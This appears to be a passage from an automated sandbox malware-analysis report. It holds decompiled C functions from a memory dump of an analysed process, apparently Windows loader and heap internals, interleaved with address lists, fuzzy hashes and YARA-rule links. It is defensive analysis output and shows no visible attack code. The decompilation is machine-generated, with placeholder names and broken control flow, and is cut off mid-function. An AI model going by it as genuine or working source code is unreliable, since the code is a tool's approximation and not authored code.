									 *_t129 = 0;
									_t129 = _t112;
									_v48 = _t129;
									break;
								}
								_v40 = _t129 - _v72;
								goto L16;
							}
							if(_t124 >= _t135) {
								_t124 = _t135;
							}
							_v40 = _t124 + _t124;
							_t137 =  *0x4da6920; // 0x7f54001c
							_t96 = 0;
							while(1) {
								_v64 = _t96;
								if(_t96 >= _t124) {
									goto L16;
								}
								 *((short*)(_t129 + _t96 * 2)) =  *((intOrPtr*)(_t137 + (_t102[_t96] & 0x000000ff) * 2));
								_t96 = _t96 + 1;
							}
							goto L16;
						}
						_t119 = (_t79 & 0x0000ffff) + 2;
						if(_t119 > (_t128[1] & 0x0000ffff) || _t119 < 2) {
							_t78 = 0x80000005;
							goto L17;
						} else {
							_t82 = _v29;
							goto L9;
						}
					}
					_t105 = 0;
					L3:
					_v36 = _t105;
					goto L4;
				}
				_t142 =  *0x4da6930 - _t104; // 0x0
				if(_t142 != 0) {
					if(_t133 == 0) {
						goto L3;
					} else {
						goto L25;
					}
					do {
						L25:
						_t133 = _t133 - 1;
						_t98 =  *_t126 & 0x000000ff;
						_t126 =  &(_t126[1]);
						if( *((short*)(0x4da4b00 + _t98 * 2)) == 0) {
							goto L28;
						}
						if(_t133 == 0) {
							_t105 = _t104 + 2;
							goto L3;
						}
						_t133 = _t133 - 1;
						_t126 =  &(_t126[1]);
						L28:
						_t104 = _t104 + 2;
					} while (_t133 != 0);
					goto L3;
				}
				_t105 = _t133 + _t133;
				goto L3;
			}

0x04ccc565
0x04ccc567
0x04ccc56c
0x04ccc577
0x04ccc57e
0x04ccc583
0x04ccc588
0x04ccc58c
0x04ccc592
0x04ccc595
0x04ccc598
0x04ccc59b
0x04ccc59d
0x04ccc5a3
0x04ccc5a8
0x04d18b39
0x04d18b4c
0x04d18b51
0x04ccc5c0
0x04ccc5c0
0x04ccc5c9
0x04d18b8b
0x04ccc6a1
0x04ccc6a4
0x04ccc6b2
0x04ccc6b2
0x04ccc5cf
0x04ccc5d2
0x04ccc5d2
0x04ccc5d5
0x04ccc5d8
0x04ccc5df
0x04ccc6b5
0x04ccc6c5
0x04ccc6ca
0x04ccc6cf
0x04ccc6ee
0x00000000
0x04ccc6ee
0x04ccc6d1
0x04ccc603
0x04ccc603
0x04ccc60a
0x04ccc611
0x04ccc618
0x04ccc61b
0x04ccc61e
0x04ccc621
0x04ccc624
0x04ccc627
0x04ccc62a
0x04ccc62d
0x04ccc632
0x04d18b97
0x04d18ba9
0x04d18b99
0x04d18b99
0x04d18b99
0x04ccc673
0x04ccc673
0x04ccc687
0x04ccc68d
0x04ccc690
0x04ccc697
0x04ccc69a
0x04ccc69f
0x00000000
0x04ccc69f
0x04ccc638
0x04ccc63a
0x04ccc63d
0x04ccc643
0x04d18bb3
0x04d18bb6
0x04d18bbe
0x04d18bbf
0x04d18bc2
0x04d18bc3
0x04d18bc6
0x04d18bd1
0x04d18bd4
0x04d18bd4
0x04d18bd7
0x04d18bdf
0x04d18c1b
0x04d18c21
0x04d18c25
0x04d18c26
0x04d18c26
0x04d18c29
0x04d18c2c
0x04d18c2f
0x00000000
0x04d18c2f
0x04d18be3
0x04d18c02
0x04d18c03
0x04d18c0b
0x04d18c10
0x04d18c14
0x04d18c15
0x04d18c16
0x00000000
0x04d18c16
0x04d18be7
0x04d18bea
0x04d18bec
0x00000000
0x04d18bec
0x04d18bf5
0x00000000
0x04d18bf5
0x04ccc64b
0x04ccc64d
0x04ccc64d
0x04ccc652
0x04ccc655
0x04ccc65b
0x04ccc65d
0x04ccc65d
0x04ccc662
0x00000000
0x00000000
0x04ccc66c
0x04ccc670
0x04ccc670
0x00000000
0x04ccc65d
0x04ccc5e8
0x04ccc5f1
0x04d18c5d
0x00000000
0x04ccc600
0x04ccc600
0x00000000
0x04ccc600
0x04ccc5f1
0x04d18b3b
0x04ccc5bd
0x04ccc5bd
0x00000000
0x04ccc5bd
0x04ccc5ae
0x04ccc5b4
0x04d18b5b
0x00000000
0x00000000
0x00000000
0x00000000
0x04d18b61
0x04d18b61
0x04d18b61
0x04d18b62
0x04d18b65
0x04d18b6f
0x00000000
0x00000000
0x04d18b73
0x04d18b83
0x00000000
0x04d18b83
0x04d18b75
0x04d18b76
0x04d18b77
0x04d18b77
0x04d18b7a
0x00000000
0x04d18b7e
0x04ccc5ba
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0736d72d3e6a118d0e2a7a3f36562375138640ee2c4ede8f2282f9f7f9b4d54
Instruction ID: 08b3c9bc32ed2b87234bfd41faa69968110d8147177ef74b678b443358c6afc2
Opcode Fuzzy Hash: e0736d72d3e6a118d0e2a7a3f36562375138640ee2c4ede8f2282f9f7f9b4d54
Instruction Fuzzy Hash: 7671E1B0D05624EBCB25CF59DA90BBEBBB2FF49710F14415EE846A7350E334A851DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D488FB Relevance: .2, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04D488FB(intOrPtr __ecx, char __edx, intOrPtr _a4, intOrPtr* _a8, char* _a12) {
				char _v5;
				signed short _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed short _t75;
				intOrPtr _t81;
				intOrPtr _t89;
				signed int _t91;
				intOrPtr _t94;
				signed int _t97;
				char* _t115;
				signed short _t116;
				void* _t123;
				void* _t125;
				signed short _t128;
				signed short _t135;
				intOrPtr _t136;
				signed int _t137;
				signed char _t140;
				signed short _t143;
				intOrPtr _t145;
				signed int _t148;
				intOrPtr _t156;
				signed short _t160;
				signed int _t161;
				intOrPtr* _t164;
				intOrPtr* _t165;
				intOrPtr* _t167;
				void* _t168;
				void* _t169;
				void* _t171;

				_v5 = __edx;
				_t133 = 0;
				_v24 = __ecx;
				_t75 = 8;
				_t135 = _t75;
				_v12 = _t135;
				if(__ecx == 0) {
					 *_a12 = 0;
					 *_a8 = 0;
					L30:
					return 0;
				}
				_t164 = __ecx + 8;
				_t148 =  *(__ecx + 4) & 0x0000ffff;
				_t165 = _t164;
				_v20 = 0;
				_v28 = _t148;
				_t80 = ( *(_a4 + 1) & 0x000000ff) + 0x00000002 << 0x00000002 & 0x0000ffff;
				_v16 = ( *(_a4 + 1) & 0x000000ff) + 0x00000002 << 0x00000002 & 0x0000ffff;
				if(_t148 == 0) {
					L17:
					_t81 =  *0x4da5d78; // 0x0
					_t166 = _t135 & 0x0000ffff;
					_t136 = E04CC5D90(_t135,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t81 + 0x140000, _t135 & 0x0000ffff);
					 *_a8 = _t136;
					if(_t136 != 0) {
						 *_a12 = 1;
						E04CD7C20(_t136, _t166, 3);
						_t89 =  *_a8;
						_v20 = _t89;
						_t167 = _t89 + 8;
						_t91 =  *(_v24 + 4) & 0x0000ffff;
						_t137 = _t91;
						if(0 >= _t91) {
							L29:
							 *(_v20 + 4) = _t137;
							goto L30;
						} else {
							goto L20;
						}
						do {
							L20:
							_t94 =  *_t164;
							if(_t94 == 0 || _v5 != 0 && _t94 == 4) {
								_v28 = _t167;
								if(_t94 != 0) {
									_t97 = _t164 + (( *(_t164 + 0xd) & 0x000000ff) + 5) * 4;
								} else {
									_t44 = _t164 + 8; // 0x2008
									_t97 = _t44;
								}
								_v16 = _t97;
								 *_t167 =  *_t164;
								 *((intOrPtr*)(_t167 + 4)) =  *((intOrPtr*)(_t164 + 4));
								_t168 = _t167 + 0xc;
								E04CF88C0(_t168, _a4, 8 + ( *(_a4 + 1) & 0x000000ff) * 4);
								_t169 = _t168 + ( *(_a4 + 1) + 0x00000002 << 0x00000002 & 0x000000ff);
								E04CF88C0(_t169, _v16, 8 + ( *(_v16 + 1) & 0x000000ff) * 4);
								_t171 = _t171 + 0x18;
								_t140 =  *(_v16 + 1);
								_t167 = _t169 + (_t140 & 0x000000ff) * 4 + 8;
								_t115 = _v28;
								 *(_t115 + 2) = ( *(_a4 + 1) & 0x000000ff) + 7 + (_t140 & 0x000000ff) << 2;
								 *_t115 = 4;
								 *((short*)(_t115 + 8)) = 1;
								_t116 =  *(_t164 + 2) & 0x0000ffff;
							} else {
								E04CF88C0(_t167, _t164,  *(_t164 + 2) & 0x0000ffff);
								_t143 =  *(_t164 + 2) & 0x0000ffff;
								_t171 = _t171 + 0xc;
								_t167 = _t167 + _t143;
								_t116 = _t143;
							}
							_t133 = _t133 + 1;
							_t164 = _t164 + (_t116 & 0x0000ffff);
							_t137 =  *(_v24 + 4) & 0x0000ffff;
						} while (_t133 < _t137);
						goto L29;
					}
					return 0xc000009a;
				} else {
					goto L3;
				}
				while(1) {
					L3:
					_t156 =  *_t165;
					if(_t156 != 0) {
						goto L6;
					}
					_t123 = E04D47828(_t135, _t80,  &_v12);
					if(_t123 >= 0) {
						_t135 = _v12;
						_push( &_v12);
						_t161 = 4;
						L12:
						_t123 = E04D47828(_t135, _t161);
						if(_t123 >= 0) {
							_t135 = _v12;
							L14:
							_t123 = E04D47828(_t135,  *(_t165 + 2) & 0x0000ffff,  &_v12);
							if(_t123 >= 0) {
								_t145 = _v20 + 1;
								_t165 = _t165 + ( *(_t165 + 2) & 0x0000ffff);
								_v20 = _t145;
								_t135 = _v12;
								if(_t145 >= _v28) {
									goto L17;
								}
								_t80 = _v16;
								continue;
							}
						}
					}
					L31:
					return _t123;
					L6:
					if(_v5 == _t133 || _t156 != 4) {
						goto L14;
					} else {
						_t160 = ( *(_t165 + 0xd) & 0x000000ff) << 2;
						_t125 = _t160 + 8;
						if(_t125 <= _v16) {
							_t128 = _v16 - _t160 - 8;
						} else {
							_t128 = _t125 - _v16;
						}
						_t161 = _t128 & 0x0000ffff;
						_push( &_v12);
						goto L12;
					}
					goto L31;
				}
			}

0x04d48908
0x04d4890b
0x04d4890f
0x04d48912
0x04d48913
0x04d48916
0x04d4891c
0x04d48921
0x04d48926
0x04d48b3c
0x00000000
0x04d48b3c
0x04d48930
0x04d48933
0x04d48937
0x04d48939
0x04d4893c
0x04d4894b
0x04d4894e
0x04d48953
0x04d489f4
0x04d489f4
0x04d489f9
0x04d48a11
0x04d48a16
0x04d48a1a
0x04d48a30
0x04d48a32
0x04d48a3c
0x04d48a3e
0x04d48a41
0x04d48a47
0x04d48a4b
0x04d48a50
0x04d48b35
0x04d48b38
0x00000000
0x00000000
0x00000000
0x00000000
0x04d48a56
0x04d48a56
0x04d48a56
0x04d48a5a
0x04d48a82
0x04d48a87
0x04d48a95
0x04d48a89
0x04d48a89
0x04d48a89
0x04d48a89
0x04d48a9b
0x04d48aa0
0x04d48aa5
0x04d48aa8
0x04d48ab9
0x04d48acf
0x04d48adf
0x04d48ae7
0x04d48aea
0x04d48af6
0x04d48b09
0x04d48b11
0x04d48b15
0x04d48b18
0x04d48b1c
0x04d48a66
0x04d48a6d
0x04d48a72
0x04d48a76
0x04d48a79
0x04d48a7b
0x04d48a7b
0x04d48b23
0x04d48b24
0x04d48b29
0x04d48b2d
0x00000000
0x04d48a56
0x00000000
0x00000000
0x00000000
0x00000000
0x04d48959
0x04d48959
0x04d48959
0x04d4895d
0x00000000
0x00000000
0x04d48965
0x04d4896c
0x04d48972
0x04d48979
0x04d4897c
0x04d489ae
0x04d489ae
0x04d489b5
0x04d489bb
0x04d489bf
0x04d489c9
0x04d489d0
0x04d489dd
0x04d489de
0x04d489e0
0x04d489e6
0x04d489ea
0x00000000
0x00000000
0x04d489ec
0x00000000
0x04d489ec
0x04d489d0
0x04d489b5
0x04d48b42
0x04d48b42
0x04d4897f
0x04d48982
0x00000000
0x04d48989
0x04d4898d
0x04d48991
0x04d48998
0x04d489a4
0x04d4899a
0x04d4899a
0x04d4899a
0x04d489a7
0x04d489ad
0x00000000
0x04d489ad
0x00000000
0x04d48982

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9a79045e61de943fc85462bfc2b16040c073ba2c7f528908067cd14a2845a1d
Instruction ID: dd1ee8896a6dd7da637b1512c2570000dc9684a10f81954ce9e00c9a571ae775
Opcode Fuzzy Hash: f9a79045e61de943fc85462bfc2b16040c073ba2c7f528908067cd14a2845a1d
Instruction Fuzzy Hash: 5471C278A042569FDB14EF59C840ABABBF1FF85344F088459F894DB341E335EA45D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04CC252B Relevance: .2, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04CC252B(intOrPtr __ecx, intOrPtr* __edx) {
				unsigned int* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr _t74;
				unsigned int* _t76;
				intOrPtr* _t84;
				char* _t85;
				unsigned int* _t94;
				char* _t111;
				char* _t120;
				intOrPtr* _t133;
				signed int _t155;
				signed int _t158;
				signed int _t161;
				unsigned int _t169;
				unsigned int* _t171;
				intOrPtr _t173;
				signed int _t178;

				_t133 = __edx;
				_t173 = __ecx;
				_v20 =  *__edx;
				_t169 = __ecx - 0xa8 + (( *(__edx + 8) & 0x000000ff) << 5);
				_v24 = __ecx;
				_t74 =  *((intOrPtr*)(__ecx + 0xc));
				_v16 = _t74;
				if( *((intOrPtr*)(_t74 + 0xe8)) != 0) {
					if(( *(_t74 + 0x40) & 0x00000001) == 0) {
						E04CBFED0( *((intOrPtr*)(_t74 + 0xc8)));
						_push( *((intOrPtr*)(_v20 + 0xc8)));
						E04CBE740(0);
					}
				}
				_t155 =  *(_t169 + 4) & 0x0000ffff;
				_v12 = _t155;
				if(_t155 >  *((intOrPtr*)(_t169 + 0xc))) {
					_t76 = _t169 + 8;
					_v8 = _t76;
					if(_t155 <=  *_t76 >>  *(_t169 + 0x10)) {
						goto L2;
					} else {
						_t142 =  *(_t133 + 8);
						_t161 = 1 <<  *(_t133 + 8);
						if(1 > 0x78000) {
							_t161 = 0x78000;
						}
						_v16 = ( *(_t133 + 0xa) & 0x0000ffff) + _t161;
						E04CADD43( *((intOrPtr*)(_v24 + 0xc)), _t133, _t142);
						if(E04CC3C40() != 0) {
							_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t111 = 0x7ffe0380;
						}
						if( *_t111 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
								goto L15;
							}
							_t135 = _v24;
							E04D6F582(_v24,  *((intOrPtr*)(_v24 + 0xc)), _t133, _v16, ( *(_v20 + 0x14) & 0x0000ffff) << 3);
							goto L16;
						} else {
							L15:
							_t135 = _v24;
							L16:
							_t94 = _t169 + 8;
							asm("lock dec dword [eax]");
							if(_v12 != 0) {
								_t94 = E04CDFE50(_t169);
								_t171 = _t94;
								if(_t171 != 0) {
									_t178 = 1 <<  *(_t171 + 8);
									if(_t178 > 0x78000) {
										_t178 = 0x78000;
									}
									_v12 = ( *(_t171 + 0xa) & 0x0000ffff) + _t178;
									asm("lock xadd [eax], ecx");
									E04CADD43( *((intOrPtr*)(_t135 + 0xc)), _t171,  ~(( *(_t171 + 0xa) & 0x0000ffff) + _t178));
									if(E04CC3C40() != 0) {
										_t120 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									} else {
										_t120 = 0x7ffe0380;
									}
									if( *_t120 != 0) {
										if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
											E04D6F4FD(_t135,  *((intOrPtr*)(_t135 + 0xc)), _t171, _v12, 0);
											E04D6F582(_t135,  *((intOrPtr*)(_t135 + 0xc)), _t171, _v12, 0);
										}
									}
									_t94 = _v8;
									asm("lock dec dword [eax]");
								}
							}
							L8:
							return _t94;
						}
					}
				}
				L2:
				_t158 = 1 <<  *(_t133 + 8);
				if(1 > 0x78000) {
					_t158 = 0x78000;
				}
				_v8 = ( *(_t133 + 0xa) & 0x0000ffff) + _t158;
				asm("lock xadd [eax], ecx");
				_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t84 != 0) {
					if( *_t84 == 0) {
						goto L5;
					}
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					L6:
					if( *_t85 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							E04D6F607(_t133,  *((intOrPtr*)(_t173 + 0xc)), _t133, _v8, ( *(_v20 + 0x14) & 0x0000ffff) << 3);
						}
					}
					L04CC2330(_t169 >> 0x00000002 & 0x0000001f, 0x4da4f60 + (_t169 >> 0x00000002 & 0x0000001f) * 4);
					 *_t133 =  *_t169;
					 *(_t169 + 4) =  *(_t169 + 4) + 1;
					 *_t169 = _t133;
					E04CC24D0(0x4da4f60 + (_t169 >> 0x00000002 & 0x0000001f) * 4);
					_t94 = 1;
					 *((intOrPtr*)(_t169 + 0x16)) =  *((intOrPtr*)(_t169 + 0x16)) + 1;
					goto L8;
				}
				L5:
				_t85 = 0x7ffe0380;
				goto L6;
			}

0x04cc2537
0x04cc253a
0x04cc2541
0x04cc2552
0x04cc2554
0x04cc2558
0x04cc255b
0x04cc2566
0x04cc26dd
0x04cc26e9
0x04cc26f2
0x04cc26f8
0x04cc26f8
0x04cc26dd
0x04cc256c
0x04cc2573
0x04cc2579
0x04cc25f5
0x04cc25f8
0x04cc2605
0x00000000
0x04cc260b
0x04cc260b
0x04cc2618
0x04cc261c
0x04cc261e
0x04cc261e
0x04cc2628
0x04cc263c
0x04cc2648
0x04d160c4
0x04cc264e
0x04cc264e
0x04cc264e
0x04cc2656
0x04d160db
0x00000000
0x00000000
0x04d160e7
0x04d160fd
0x00000000
0x04cc265c
0x04cc265c
0x04cc265c
0x04cc2660
0x04cc2660
0x04cc2663
0x04cc266b
0x04cc2673
0x04cc2678
0x04cc267c
0x04cc2685
0x04cc268e
0x04cc2690
0x04cc2690
0x04cc269a
0x04cc26a3
0x04cc26ad
0x04cc26b9
0x04d16110
0x04cc26bf
0x04cc26bf
0x04cc26bf
0x04cc26c7
0x04d16127
0x04d16139
0x04d16146
0x04d16146
0x04d16127
0x04cc26cd
0x04cc26d1
0x04cc26d1
0x04cc267c
0x04cc25ec
0x04cc25f2
0x04cc25f2
0x04cc2656
0x04cc2605
0x04cc257b
0x04cc2586
0x04cc258a
0x04cc258c
0x04cc258c
0x04cc2594
0x04cc259d
0x04cc25a7
0x04cc25ac
0x04d16153
0x00000000
0x00000000
0x04d16162
0x04cc25b7
0x04cc25ba
0x04d16179
0x04d16197
0x04d16197
0x04d16179
0x04cc25d0
0x04cc25d7
0x04cc25d9
0x04cc25de
0x04cc25e0
0x04cc25e7
0x04cc25e8
0x00000000
0x04cc25e8
0x04cc25b2
0x04cc25b2
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad08d95938d4224eb5f9c47f8f8b31be5cf315c7476933ef089c61dcb2c20147
Instruction ID: d18113d7bcc2b04f5212a9f91054df948d3cab29a27e9d043dad32a7d838ee05
Opcode Fuzzy Hash: ad08d95938d4224eb5f9c47f8f8b31be5cf315c7476933ef089c61dcb2c20147
Instruction Fuzzy Hash: 5171C031B046519FD311DF28C490B6AB7E6FF88714F0885AEE859CB351EB38E945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CECCD1 Relevance: .2, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E04CECCD1(char __ecx, signed int __edx, signed int _a4) {
				char _v9;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				signed char _v48;
				signed int _v52;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t58;
				signed int _t61;
				signed int _t69;
				signed int _t78;
				signed int* _t96;
				signed int _t98;
				intOrPtr* _t101;
				signed char _t105;
				intOrPtr _t116;
				signed int _t120;
				signed int* _t124;
				intOrPtr* _t133;
				signed int _t135;
				signed int _t137;

				_t129 = __edx;
				_t58 = _a4;
				_v36 = __edx;
				_v20 =  *[fs:0x30];
				_t105 = _t58 + 2;
				_v48 = _t105;
				_v40 = __ecx;
				_t61 = 1 << _t105;
				_t133 = 0x4da933c + _t58 * 0xc;
				_v9 = 0;
				if(( *(_v20 + 0x28) & 1) != 0) {
					_v56 = __ecx;
					_t137 = 0;
					__eflags = 0;
					_v52 = __edx;
					L04CC2330(_t61,  *_t133);
					_t101 =  *((intOrPtr*)(_t133 + 4));
					while(1) {
						__eflags = _t101 - _t133 + 4;
						if(_t101 == _t133 + 4) {
							break;
						}
						_v24 = _t101;
						_v44 = _t101 + 8;
						asm("lock xadd [eax], ecx");
						__eflags = 2 - 1;
						if(2 <= 1) {
							_push(0xe);
							_pop(2);
							asm("int 0x29");
						}
						E04CC24D0( *_t133);
						_t129 =  *0x4da65fc; // 0x870e43ac
						_v16 =  *((intOrPtr*)(_t101 + 0x10));
						__eflags = _t129;
						if(_t129 == 0) {
							_push(0);
							_push(4);
							_push( &_v32);
							_push(0x24);
							_push(0xffffffff);
							_t78 = E04CF2B20();
							__eflags = _t78;
							if(_t78 < 0) {
								L04D08AA0(2, _t129, _t78);
								goto L27;
							}
							_t129 = _v32;
							 *0x4da65fc = _t129;
							goto L6;
						} else {
							L6:
							_v28 = _v28 & 0x00000000;
							_push(0x20);
							asm("ror eax, cl");
							_t116 = _v20;
							_t83 = _v16 ^ _t129;
							_v16 = _v16 ^ _t129;
							__eflags =  *(_t116 + 0x68) & 0x00800000;
							if(( *(_t116 + 0x68) & 0x00800000) != 0) {
								_v28 = E04D68C65(_v40, _v36, _t116, _t83);
								_t83 = _v16;
							}
							 *0x4da91e0( &_v56);
							_t87 =  *_v16();
							_t120 = _v28;
							_t129 = _t87;
							_v16 = _t129;
							__eflags = _t120;
							if(_t120 != 0) {
								__eflags = _t129 - 0xffffffff;
								_t87 = 0 | __eflags != 0x00000000;
								 *(_t120 + 0x320) = __eflags != 0;
							}
							L04CC2330(_t87,  *_t133);
							_t101 =  *_t101;
							asm("lock xadd [eax], ecx");
							__eflags = (_t120 | 0xffffffff) - 1;
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t47 = _v24 + 0xc; // 0x1c244c8d
									__eflags =  *_t47;
									if( *_t47 == 0) {
										_push(0x3c);
										L29:
										asm("int 0x29");
										L30:
										E04CEC640(_t101, 0, _t129, _t133);
										__eflags = 0;
										do {
											_t135 = _t137;
											_t137 =  *_t137;
											E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t135 + 8)));
											_t69 = E04CD0130();
											_push(_t135);
											_push(0);
											__eflags = _t69;
											if(_t69 != 0) {
												_push( *0x4da921c);
											} else {
												_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
											}
											E04CC3BC0();
											__eflags = _t137;
										} while (_t137 != 0);
										E04CEC640(0, 1, _t129, _t135);
										goto L1;
									}
									E04CEC640(_t101, 0, _t129, _t133);
									E04CE1D66(0, _t129, 0);
									_t124 = _v24;
									_t129 =  *_t124;
									__eflags =  *(_t129 + 4) - _t124;
									if( *(_t129 + 4) != _t124) {
										L27:
										_push(3);
										goto L29;
									}
									_t50 =  &(_t124[1]); // 0xf2
									_t96 =  *_t50;
									__eflags =  *_t96 - _t124;
									if( *_t96 != _t124) {
										goto L27;
									}
									 *_t96 = _t129;
									 *(_t129 + 4) = _t96;
									__eflags = _t96 - _t129;
									if(_t96 == _t129) {
										_t124 = _v20 + 0x28;
										asm("lock btr [ecx], eax");
									}
									E04CE1D66(_t124, _t129, 1);
									_t98 = _v24;
									 *_t98 = _t137;
									_t137 = _t98;
									E04CEC640(_t101, 1, _t129, _t133);
									goto L9;
								}
								_push(0xe);
								asm("int 0x29");
								goto L9;
							} else {
								L9:
								__eflags = _v16 - 0xffffffff;
								if(_v16 != 0xffffffff) {
									continue;
								}
								_v9 = 1;
								break;
							}
						}
					}
					E04CC24D0( *_t133);
					__eflags = _t137;
					if(_t137 == 0) {
						goto L1;
					}
					goto L30;
				}
				L1:
				return _v9;
			}

0x04ceccd1
0x04ceccd9
0x04cecce0
0x04ceccee
0x04ceccf1
0x04ceccf6
0x04ceccfa
0x04ceccfd
0x04cecd02
0x04cecd08
0x04cecd0f
0x04cecd1d
0x04cecd20
0x04cecd20
0x04cecd22
0x04cecd25
0x04cecd2a
0x04cecd2d
0x04cecd30
0x04cecd32
0x00000000
0x00000000
0x04cecd3b
0x04cecd40
0x04cecd46
0x04cecd4b
0x04cecd4e
0x04d287ff
0x04d28801
0x04d28802
0x04d28802
0x04cecd56
0x04cecd5b
0x04cecd64
0x04cecd67
0x04cecd69
0x04d28809
0x04d2880b
0x04d28810
0x04d28811
0x04d28813
0x04d28815
0x04d2881a
0x04d2881c
0x04d288c2
0x00000000
0x04d288c2
0x04d28822
0x04d28825
0x00000000
0x04cecd6f
0x04cecd6f
0x04cecd6f
0x04cecd78
0x04cecd80
0x04cecd82
0x04cecd85
0x04cecd87
0x04cecd8a
0x04cecd91
0x04d2883d
0x04d28840
0x04d28840
0x04cecd9d
0x04cecda6
0x04cecda8
0x04cecdab
0x04cecdad
0x04cecdb0
0x04cecdb2
0x04d2884a
0x04d2884d
0x04d28850
0x04d28850
0x04cecdba
0x04cecdc5
0x04cecdc9
0x04cecdce
0x04cecdd0
0x04d2885b
0x04d2886a
0x04d2886d
0x04d2886f
0x04d288cb
0x04d288cd
0x04d288ce
0x04d288d0
0x04d288d2
0x04d288d7
0x04d288d9
0x04d288df
0x04d288e1
0x04d288ea
0x04d288ef
0x04d288f4
0x04d288f5
0x04d288f6
0x04d288f8
0x04d28905
0x04d288fa
0x04d28900
0x04d28900
0x04d2890b
0x04d28910
0x04d28910
0x04d28917
0x00000000
0x04d28917
0x04d28873
0x04d2887a
0x04d2887f
0x04d28882
0x04d28884
0x04d28887
0x04d288c7
0x04d288c7
0x00000000
0x04d288c7
0x04d28889
0x04d28889
0x04d2888c
0x04d2888e
0x00000000
0x00000000
0x04d28890
0x04d28892
0x04d28895
0x04d28897
0x04d2889f
0x04d288a2
0x04d288a2
0x04d288a8
0x04d288ad
0x04d288b3
0x04d288b5
0x04d288b7
0x00000000
0x04d288b7
0x04d2885d
0x04d28860
0x00000000
0x04cecdd6
0x04cecdd6
0x04cecdd6
0x04cecdda
0x00000000
0x00000000
0x04cecde0
0x00000000
0x04cecde0
0x04cecdd0
0x04cecd69
0x04cecde6
0x04cecdeb
0x04cecded
0x00000000
0x00000000
0x00000000
0x04cecdf3
0x04cecd11
0x04cecd18

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92c5c9fcb148da80b88b8d945ad052687398df341f92293db081116bdcafef01
Instruction ID: 251dbe82c56510236134c1a5accf8ba69be9b3ea35083dbbac4bc6f91dd19745
Opcode Fuzzy Hash: 92c5c9fcb148da80b88b8d945ad052687398df341f92293db081116bdcafef01
Instruction Fuzzy Hash: A761E370E00215DFDB18EF69D990ABEB7B6FF08318F14426AE511EB290DB35E901EB50

Uniqueness

Uniqueness Score: -1.00%

Function 04CACEF0 Relevance: .2, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CACEF0(void* __ecx, signed int* _a4, signed int _a8) {
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t123;
				signed int _t131;
				signed int* _t134;

				_t134 = _a4;
				_t131 = 0;
				if(_t134 == 0) {
					L70:
					_t131 = 0xc000000d;
					L15:
					return _t131;
				}
				_t123 = _a8;
				if(_t123 == 0) {
					goto L70;
				}
				if((_t123 & 0x00000400) != 0) {
					_t123 = 0xfff;
				}
				if((_t123 & 0x00000001) != 0) {
					if(_t134[5] != _t131) {
						if(( *_t134 & 0x00000001) != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[5]);
						}
						_t134[5] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffe;
				}
				if((_t123 & 0x00000002) != 0) {
					if(_t134[6] != _t131) {
						if(( *_t134 & 0x00000002) != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[6]);
						}
